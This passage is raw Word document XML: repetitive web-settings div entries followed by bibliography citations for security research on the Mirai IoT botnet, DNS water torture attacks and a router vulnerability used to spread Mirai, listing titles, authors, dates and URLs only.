        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1992515567">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1992833837">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1994988916">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1999840949">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2000041766">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2000183166">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2000453264">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2004887896">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2007240565">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2007855054">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2013408090">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2014410406">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2017295351">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2026900286">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2029216438">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2030715225">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2032142559">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2035763342">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2042978293">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2045787975">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2049135140">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2056344714">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2057923878">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2058695170">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2061319809">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2061594224">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2065518466">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2073305657">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2086678345">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2108765134">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2109231042">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2116366703">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2117827026">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2127389405">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2129740699">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2130738645">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2144806689">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="214573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Rol16</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{458DC9B7-4DF3-495E-9B2F-628BB7CDD9CB}</b:Guid>
    <b:Title>Mirai IoT Botnet Description and DDoS Attack Mitigation</b:Title>
    <b:Year>2016</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Dobbins</b:Last>
            <b:First>Roland</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Month>10</b:Month>
    <b:Day>26</b:Day>
    <b:URL>https://www.arbornetworks.com/blog/asert/mirai-iot-botnet-description-ddos-attack-mitigation/</b:URL>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>绿盟科16</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{D9345443-F792-4F06-91E3-1949B1EE86B6}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>绿盟科技</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>德国1127断网事件技术分析与防护方案</b:Title>
    <b:InternetSiteTitle>绿盟科技博客</b:InternetSiteTitle>
    <b:Year>2016</b:Year>
    <b:Month>12</b:Month>
    <b:Day>25</b:Day>
    <b:URL>http://blog.nsfocus.net/germany-1127-network-events/</b:URL>
    <b:RefOrder>11</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>360</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{070EB370-DD23-4389-BE89-EF895E15E9FD}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>360网络安全研究院</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>关于dyn/twitter受攻击情况的说明和mirai僵尸网络的回顾</b:Title>
    <b:URL>http://blog.netlab.360.com/a-dyn-twitter-ddos-event-report-and-mirai-botnet-review/</b:URL>
    <b:Year>2016</b:Year>
    <b:Month>10</b:Month>
    <b:Day>23</b:Day>
    <b:RefOrder>4</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>36016</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{71D773EB-2030-4D4C-80D4-26E3267ED433}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>360网络安全研究院</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>关于 mirai 僵尸网络控制主机的数据分析</b:Title>
    <b:Year>2016</b:Year>
    <b:Month>10</b:Month>
    <b:Day>27</b:Day>
    <b:URL>http://blog.netlab.360.com/a-mirai-botnet-c2-data-analysis/</b:URL>
    <b:RefOrder>10</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Tak16</b:Tag>
    <b:SourceType>ArticleInAPeriodical</b:SourceType>
    <b:Guid>{BB4EB0F8-0DD0-4245-8B51-A4E39366D44C}</b:Guid>
    <b:Title>Detection of the DNS Water Torture Attack by Analyzing Features of the Subdomain Name</b:Title>
    <b:Year>2016</b:Year>
    <b:Month>24</b:Month>
    <b:Day>5</b:Day>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Takeuchi Y</b:Last>
            <b:First>Yoshida</b:First>
            <b:Middle>T, Kobayashi R, et al.</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:PeriodicalTitle>Journal of Information Processing</b:PeriodicalTitle>
    <b:Pages> 793-801</b:Pages>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Sec14</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{063DF24B-F63C-4888-B068-ED0A592F8A2C}</b:Guid>
    <b:Title>Water Torture: A Slow Drip DNS DDoS Attack</b:Title>
    <b:Year>2014</b:Year>
    <b:Author>
      <b:Author>
        <b:Corporate>Secure64</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Month>2</b:Month>
    <b:Day>25</b:Day>
    <b:URL>https://blog.secure64.com/?p=377</b:URL>
    <b:RefOrder>3</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>360161</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{EC8E463A-2D19-4819-AC71-0F83AF95A1ED}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>360网络安全研究院</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>德国电信断网：mirai僵尸网络的新变种和旧主控</b:Title>
    <b:Year>2016</b:Year>
    <b:Month>11</b:Month>
    <b:Day>29</b:Day>
    <b:URL>http://blog.netlab.360.com/a-mirai-botnet-evolvement-new-variant-and-old-c2/</b:URL>
    <b:RefOrder>5</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>李东宏16</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{F24B9C47-C23B-4C14-916D-5FD1E1A9BC59}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>李东宏</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Mirai源码分析报告</b:Title>
    <b:Year>2016</b:Year>
    <b:Month>10</b:Month>
    <b:Day>13</b:Day>
    <b:URL>http://blog.nsfocus.net/mirai-source-analysis-report/</b:URL>
    <b:RefOrder>12</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>3601</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{67FC73D4-FF45-4EB1-AFDA-34944D87AEA3}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>360网络安全研究院</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Mirai Scanner</b:Title>
    <b:URL>http://data.netlab.360.com/mirai-scanner</b:URL>
    <b:RefOrder>9</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Bad</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{73DB4115-7495-42D1-ADBC-7A717ABF2EF2}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>BadCyber</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>New Mirai attack vector – bot exploits a recently discovered router vulnerability</b:Title>
    <b:URL>https://badcyber.com/new-mirai-attack-vector-bot-exploits-a-recently-discovered-router-vulnerability/</b:URL>
    <b:RefOrder>17</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Wik16</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{C77639F4-6479-49DB-8C58-5FABB730C6A3}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Wikipedia</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Mirai (malware)</b:Title>
    <b:Year>2016</b:Year>
    <b:Month>12</b:Month>
    <b:URL>https://en.wikipedia.org/wiki/Mirai_(malware)</b:URL>
    <b:RefOrder>8</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>len16</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{D9EBE9C0-1692-46C2-BE0D-AC62868F5892}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>lennarthaagsma</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Recent vulnerability in Eir D1000 Router used to spread updated version of Mirai DDoS bot</b:Title>
    <b:Year>2016</b:Year>
    <b:Month>11</b:Month>
    <b:Day>28</b:Day>
    <b:URL>https://blog.fox-it.com/2016/11/28/recent-vulnerability-in-eir-d1000-router-used-to-spread-updated-version-of-mirai-ddos-bot/</b:URL>
    <b:RefOrder>15</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Ken16</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{E72B2DA5-E26B-4EC0-8A23-E8EB5FE79C7F}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Kenzo</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Eir’s D1000 Modem Is Wide Open To Being Hacked</b:Title>
    <b:Year>2016</b:Year>
    <b:Month>11</b:Month>
    <b:Day>7</b:Day>
    <b:URL>https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/</b:URL>
    <b:RefOrder>16</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>360162</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{6FEA8B73-7DBA-4E62-A667-493843645999}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>360网络安全研究院</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Mirai 变种中的DGA</b:Title>
    <b:Year>2016</b:Year>
    <b:Month>12</b:Month>
    <b:Day>9</b:Day>
    <b:URL>http://blog.netlab.360.com/new-mirai-variant-with-dga-chinese-version/</b:URL>
    <b:RefOrder>6</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>泰格实17</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{27313EDE-9E33-4C0F-A8AE-CD43C89F8ED3}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>泰格实验室</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>蜜罐揭秘真实的Mirai僵尸网络</b:Title>
    <b:Year>2017</b:Year>
    <b:Month>1</b:Month>
    <b:Day>9</b:Day>
    <b:URL>http://www.freebuf.com/articles/terminal/124717.html</b:URL>
    <b:RefOrder>14</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Joh</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{4CD1B70B-FF0D-4DE1-87A4-DF9C021E2AEB}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
